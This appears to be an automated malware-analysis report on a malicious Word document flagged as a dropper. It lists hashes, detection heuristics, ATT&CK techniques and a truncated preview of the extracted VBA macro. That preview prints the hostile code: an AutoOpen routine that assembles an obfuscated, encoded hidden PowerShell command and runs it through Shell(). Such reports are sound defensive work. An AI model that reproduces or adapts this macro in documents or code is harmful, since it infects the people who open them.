Office (OLE) malware analysis — malicious · 81fc8503f4a2e06b

MALICIOUS

Office (OLE)

115.8 KB Created: 2018-05-28 07:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 922e0a50d64d04119fd2c4fdfe6548c1 SHA-1: 2a1217d07b4a3384893d9dc0e896516086962fd1 SHA-256: 81fc8503f4a2e06ba55bdfb8abaabeb2649f3d3ed358bca2e87e1135df1b57d6

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that calls Shell() to execute a command. The script constructs a PowerShell command by concatenating strings, which is then executed with the '-e' flag for encoded commands. This indicates the macro's purpose is to download and execute a second-stage payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6561190-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6561190-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18826 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18826 bytes
SHA-256: `635293aea24e34f1614186c1cedd08581816194cc4c1feb803d19101bea63999`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZwNcGOTTakcIh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function AfoSJ() On Error Resume Next VkrnG = (SbcQIj * SjbXrX - OSVmiE * Round(9835)) + (12955 - Rnd(fmGsLj) + 18494 + RKdYK) oBhqkT = (hhUqEC * EECbL - zdCnim * Round(43224)) + (19667 - Rnd(htZDh) + 62899 + BNUmDz) AfoSJ = ScNAAEcw + kuHttpzCNww + GWTAiwQ + wjhivzCS + QmbTSfGKNzd + hZzOqXMzCiX + HRJhTZ + orsLFDlbbCl + tUilhRiju + amQCqGYkzj + LkZzvAtLfSz lBHdu = (NHCMi * LztLwz - czbRAV * Round(66524)) + (36782 - Rnd(oGZZz) + 46057 + lXIcw) End Function Sub Autoopen() On Error Resume Next ZqNUsV = (HCVpRV * KkGIL - JSvnJo * Round(75127)) + (67076 - Rnd(nqVok) + 50150 + EjcMhw) IYJzk (AfoSJ) ljHiSG = (RAQCi * uZKDi - zOiUc * Round(69530)) + (61020 - Rnd(jafwMN) + 62180 + DCKUc) End Sub Function IYJzk(oXwEiCInkj) On Error Resume Next WqEmC = (piVYi * wXGPfu - jVqURq * Round(39631)) + (51628 - Rnd(VItNZt) + 84630 + PqhMkB) GUhQI = (oWQiw * fVnwis - JMfQE * Round(7512)) + (61045 - Rnd(zoMZv) + 38913 + NzIESh) DiYizN = Shell(kzHuAv + Chr(vbKeyP) + BiWBKA + oXwEiCInkj, vbHide) mdfdIM = (cuzUj * tbDcMc - phDIBQ * Round(88658)) + (15105 - Rnd(niZXca) + 3594 + bvTzXu) End Function Attribute VB_Name = "EPcsmtfrp" Function ScNAAEcw() On Error Resume Next BEukq = (LlEINa * zDzkW - spIslw * Round(67615)) + (5570 - Rnd(QYUXLq) + 50441 + YGOvKv) XMFpO = "owersHeLL -Win" + "DowsT" + "yle hidden -" + "e SQBOA" + "FYAbw" + "BrAGUALQBlAHg" + "AUABSAEUAcwBzA" + "EkAbwBuACAAKA" + "AoACgA" inZID = (hLNTX * sLJmH - WUjnpP * Round(18247)) + (49401 - Rnd(aiIli) + 88346 + OzYbz) ObflppYrU = "IgB7ADEAMgA3AH0" + "AewAxADEANwB9A" + "HsANQAxAH" + "0AewA5ADYAfQB" + "7ADUAMA" + "B9AHsAN" + "gAyAH0AewAxA" + "DIAMwB9" jMGDnf = (fPUGAn * ZqwKwd - GhFioQ * Round(80834)) + (94390 - Rnd(Njwkl) + 37825 + lbdsjL) dWkqRINtk = "AHsAOAAwAH0A" + "ewAyADcAf" + "QB7ADIA" + "OAB9AHsAMQA1A" + "DAAfQB7A" + "DEAMgA2AH0AewA" BluSc = (zOcWu * iBVzPr - EGaDDp * Round(12131)) + (16840 - Rnd(iVlLv) + 45898 + wtzNY) sqNlJj = "xADIA" + "fQB7ADYA" + "MQB9AHsAOAA" + "3AH0AewA5ADkAf" + "QB7ADgAfQB7ADEA" + "MwA1AH0Ae" + "wAxADE" wDZpJ = (jQcOAz * Dbhqd - PnjHk * Round(67201)) + (63649 - Rnd(wZFRi) + 19204 + HWdOfR) jOrzcLKfldC = "AOQB9AHsAMQA" + "yADkAfQB7" + "ADEAMgAxAH0AewA" + "xADAAfQB7ADkAN" + "wB9AHsAOQAzA" + "H0AewAxADUAMQB" wGGlNo = (bOCTr * YSwpG - ihrWzW * Round(75764)) + (28449 - Rnd(EDcwEm) + 82868 + AzUsm) BcOXFYIz = "9AHsAM" + "QAzADQA" + "fQB7ADEAMQA2A" + "H0AewAxADEAMwB" + "9AHsAOA" + "A4AH0AewA0" + "ADgAfQB7AD" + "EAMAAxA" + "H0AewAxADUANA" + "B9AHsAMQAxADgA" KCzmA = (oaoHD * vFjJOa - YXLaV * Round(73693)) + (43833 - Rnd(tvpljv) + 20730 + TzjmvG) swcnhlB = "fQB7A" + "DEAMwA" + "3AH0Aew" + "AyADYAfQB7ADgA" + "NQB9AHsANQA0" + "AH0AewAxADAAMgB" + "9AHsAN" + "gA4AH0AewA4AD" + "EAfQB7ADcAMAB" ScNAAEcw = XMFpO + ObflppYrU + dWkqRINtk + sqNlJj + jOrzcLKfldC + BcOXFYIz + swcnhlB End Function Function kuHttpzCNww() On Error Resume Next PVuVrm = (rkuSNz * cbAdlv - wVTnkY * Round(30497)) + (19178 - Rnd(niStwE) + 51671 + fvDDF) MJvLOWm = "9AHsANwA3A" + "H0AewA5" + "ADQAfQB7ADM" + "ANQB9AHsANQA3AH" + "0AewA2ADUA" RiLhrX = (JKKzQA * hHNahF - ovFCY * Round(1702)) + (68869 - Rnd(psbtdC) + 10688 + qYmwi) fjMisEs = "fQB7ADEAMAA3AH0" + "AewA1AH0AewAxAD" + "QAMQB9AHs" + "AMQAzADgAfQB7AD" + "kANQB9AH" + "sAMQA1ADg" + "AfQB7ADYA" + "MAB9AHsANAA1AH" HvfDz = (YidWzk * mFfTXw - VSWWW * Round(47163)) + (54222 - Rnd(XBvIcV) + 77325 + XUBAa) ftiUiIVvAr = "0AewA1ADYA" + "fQB7ADEA" + "NAA0AH0Aew" + "A3ADQAfQB7ADQAO" PFtsa = (TLEPw * woZJh - GqKbbr * Round(16546)) + (14191 - Rnd(vHzVwk) + 26612 + QcdwJ) hPdmanZw = "QB9AHsAMQAyADQA" + "fQB7ADQANg" + "B9AHs" + "AMQAyADg" + "AfQB7ADcAMgB9A" + "HsANgAzAH0A" + "ewAxADUA" MwjKI = (zkOmZ * kwndCk - UYDFt * Round(99772)) + (67947 - Rnd(lIjDcz) + 54463 + ivhAkz) NFkTUuEz = "NgB9AHsAM" + "wAyAH0AewA" + "xADUANwB9AHsA" + ... (truncated)

SHA-256: 635293aea24e34f1614186c1cedd08581816194cc4c1feb803d19101bea63999

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZwNcGOTTakcIh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AfoSJ()
On Error Resume Next
VkrnG = (SbcQIj * SjbXrX - OSVmiE * Round(9835)) + (12955 - Rnd(fmGsLj) + 18494 + RKdYK)
oBhqkT = (hhUqEC * EECbL - zdCnim * Round(43224)) + (19667 - Rnd(htZDh) + 62899 + BNUmDz)
AfoSJ = ScNAAEcw + kuHttpzCNww + GWTAiwQ + wjhivzCS + QmbTSfGKNzd + hZzOqXMzCiX + HRJhTZ + orsLFDlbbCl + tUilhRiju + amQCqGYkzj + LkZzvAtLfSz
lBHdu = (NHCMi * LztLwz - czbRAV * Round(66524)) + (36782 - Rnd(oGZZz) + 46057 + lXIcw)
End Function
Sub Autoopen()
On Error Resume Next
ZqNUsV = (HCVpRV * KkGIL - JSvnJo * Round(75127)) + (67076 - Rnd(nqVok) + 50150 + EjcMhw)
IYJzk (AfoSJ)
ljHiSG = (RAQCi * uZKDi - zOiUc * Round(69530)) + (61020 - Rnd(jafwMN) + 62180 + DCKUc)
End Sub
Function IYJzk(oXwEiCInkj)
On Error Resume Next
WqEmC = (piVYi * wXGPfu - jVqURq * Round(39631)) + (51628 - Rnd(VItNZt) + 84630 + PqhMkB)
GUhQI = (oWQiw * fVnwis - JMfQE * Round(7512)) + (61045 - Rnd(zoMZv) + 38913 + NzIESh)
DiYizN = Shell(kzHuAv + Chr(vbKeyP) + BiWBKA + oXwEiCInkj, vbHide)
mdfdIM = (cuzUj * tbDcMc - phDIBQ * Round(88658)) + (15105 - Rnd(niZXca) + 3594 + bvTzXu)
End Function


Attribute VB_Name = "EPcsmtfrp"
Function ScNAAEcw()
On Error Resume Next
BEukq = (LlEINa * zDzkW - spIslw * Round(67615)) + (5570 - Rnd(QYUXLq) + 50441 + YGOvKv)
XMFpO = "owersHeLL -Win" + "DowsT" + "yle hidden -" + "e SQBOA" + "FYAbw" + "BrAGUALQBlAHg" + "AUABSAEUAcwBzA" + "EkAbwBuACAAKA" + "AoACgA"
inZID = (hLNTX * sLJmH - WUjnpP * Round(18247)) + (49401 - Rnd(aiIli) + 88346 + OzYbz)
ObflppYrU = "IgB7ADEAMgA3AH0" + "AewAxADEANwB9A" + "HsANQAxAH" + "0AewA5ADYAfQB" + "7ADUAMA" + "B9AHsAN" + "gAyAH0AewAxA" + "DIAMwB9"
jMGDnf = (fPUGAn * ZqwKwd - GhFioQ * Round(80834)) + (94390 - Rnd(Njwkl) + 37825 + lbdsjL)
dWkqRINtk = "AHsAOAAwAH0A" + "ewAyADcAf" + "QB7ADIA" + "OAB9AHsAMQA1A" + "DAAfQB7A" + "DEAMgA2AH0AewA"
BluSc = (zOcWu * iBVzPr - EGaDDp * Round(12131)) + (16840 - Rnd(iVlLv) + 45898 + wtzNY)
sqNlJj = "xADIA" + "fQB7ADYA" + "MQB9AHsAOAA" + "3AH0AewA5ADkAf" + "QB7ADgAfQB7ADEA" + "MwA1AH0Ae" + "wAxADE"
wDZpJ = (jQcOAz * Dbhqd - PnjHk * Round(67201)) + (63649 - Rnd(wZFRi) + 19204 + HWdOfR)
jOrzcLKfldC = "AOQB9AHsAMQA" + "yADkAfQB7" + "ADEAMgAxAH0AewA" + "xADAAfQB7ADkAN" + "wB9AHsAOQAzA" + "H0AewAxADUAMQB"
wGGlNo = (bOCTr * YSwpG - ihrWzW * Round(75764)) + (28449 - Rnd(EDcwEm) + 82868 + AzUsm)
BcOXFYIz = "9AHsAM" + "QAzADQA" + "fQB7ADEAMQA2A" + "H0AewAxADEAMwB" + "9AHsAOA" + "A4AH0AewA0" + "ADgAfQB7AD" + "EAMAAxA" + "H0AewAxADUANA" + "B9AHsAMQAxADgA"
KCzmA = (oaoHD * vFjJOa - YXLaV * Round(73693)) + (43833 - Rnd(tvpljv) + 20730 + TzjmvG)
swcnhlB = "fQB7A" + "DEAMwA" + "3AH0Aew" + "AyADYAfQB7ADgA" + "NQB9AHsANQA0" + "AH0AewAxADAAMgB" + "9AHsAN" + "gA4AH0AewA4AD" + "EAfQB7ADcAMAB"
ScNAAEcw = XMFpO + ObflppYrU + dWkqRINtk + sqNlJj + jOrzcLKfldC + BcOXFYIz + swcnhlB
End Function
Function kuHttpzCNww()
On Error Resume Next
PVuVrm = (rkuSNz * cbAdlv - wVTnkY * Round(30497)) + (19178 - Rnd(niStwE) + 51671 + fvDDF)
MJvLOWm = "9AHsANwA3A" + "H0AewA5" + "ADQAfQB7ADM" + "ANQB9AHsANQA3AH" + "0AewA2ADUA"
RiLhrX = (JKKzQA * hHNahF - ovFCY * Round(1702)) + (68869 - Rnd(psbtdC) + 10688 + qYmwi)
fjMisEs = "fQB7ADEAMAA3AH0" + "AewA1AH0AewAxAD" + "QAMQB9AHs" + "AMQAzADgAfQB7AD" + "kANQB9AH" + "sAMQA1ADg" + "AfQB7ADYA" + "MAB9AHsANAA1AH"
HvfDz = (YidWzk * mFfTXw - VSWWW * Round(47163)) + (54222 - Rnd(XBvIcV) + 77325 + XUBAa)
ftiUiIVvAr = "0AewA1ADYA" + "fQB7ADEA" + "NAA0AH0Aew" + "A3ADQAfQB7ADQAO"
PFtsa = (TLEPw * woZJh - GqKbbr * Round(16546)) + (14191 - Rnd(vHzVwk) + 26612 + QcdwJ)
hPdmanZw = "QB9AHsAMQAyADQA" + "fQB7ADQANg" + "B9AHs" + "AMQAyADg" + "AfQB7ADcAMgB9A" + "HsANgAzAH0A" + "ewAxADUA"
MwjKI = (zkOmZ * kwndCk - UYDFt * Round(99772)) + (67947 - Rnd(lIjDcz) + 54463 + ivhAkz)
NFkTUuEz = "NgB9AHsAM" + "wAyAH0AewA" + "xADUANwB9AHsA" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.